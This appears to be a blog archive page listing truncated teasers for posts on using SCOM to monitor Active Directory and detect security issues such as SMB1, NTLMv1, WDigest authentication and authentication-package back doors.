Reliable Time Monitor False Positives for AD Domain Member Monitoring

Disclaimer: Due to changes in the MSFT corporate blogging policy, I’m moving all of my content to the following location. Please reference all future content from that location. Thanks. I had a chance to work with a customer on importing the new AD MP for SCOM. I like this MP in particular, as it’s much…

3

Security Monitoring: Using SCOM to Detect Bypassed Authentication Package Back Door

Disclaimer: Due to changes in the MSFT corporate blogging policy, I’m moving all of my content to the following location. Please reference all future content from that location. Thanks. One persistence method that an attacker can use is to modify an Operating System’s authentication packages in order to give the attacker a back door for…

5

Security Monitoring: Detecting Wdigest Authentication

Disclaimer: Due to changes in the MSFT corporate blogging policy, I’m moving all of my content to the following location. Please reference all future content from that location. Thanks. One of the noisier items in the Security Monitoring Management Pack is the monitor that triggers against all Windows 2008 R2 and below systems if the…

0

Security Monitoring: Using SCOM to Detect SMB1 Authentications

Disclaimer: Due to changes in the MSFT corporate blogging policy, I’m moving all of my content to the following location. Please reference all future content from that location. Thanks. I think at this point, we are all aware of the dangers posed by continuing SMB1 authentication in an environment. The virus wannacry infected more than…

0

Security Monitoring: Using SCOM to detect NTLMv1 and LanManager Authentication Types

Disclaimer: Due to changes in the MSFT corporate blogging policy, I’m moving all of my content to the following location. Please reference all future content from that location. Thanks. One of the big changes in the next release of the Security Monitoring management pack will be reports designed to let administrators if they are using…

0

A Deep Dive into Dynamic Group Calculation and How it Affects SCOM Performance

Disclaimer: Due to changes in the MSFT corporate blogging policy, I’m moving all of my content to the following location. Please reference all future content from that location. Thanks. I would first like to give a special thanks to John Mckeown and Nick Masiuk, both of whom provided major contributions to the work described below….

3

Stupid Little Problem with SNMP Version Tags

Disclaimer: Due to changes in the MSFT corporate blogging policy, I’m moving all of my content to the following location. Please reference all future content from that location. Thanks. I don’t normally get to work with SNMP, but I’ve been at a customer this week where we needed to configure SCOM to do SNMP monitoring. …

0

SCOM Security Monitoring in Action: Detecting an Attacker

Disclaimer: Due to changes in the MSFT corporate blogging policy, I’m moving all of my content to the following location. Please reference all future content from that location. Thanks. This is a fun little story today, but I got to see first hand how our security management pack works during a real, non-simulated attack.  I…

3

Using SCOM to Capture Registering Remotely Located DLL Files

Disclaimer: Due to changes in the MSFT corporate blogging policy, I’m moving all of my content to the following location. Please reference all future content from that location. Thanks. I’ve started browsing some sites that are cataloguing known attack vectors and came across this particular vulnerability that is worth discussing.  Many seasoned IT pros understand…

2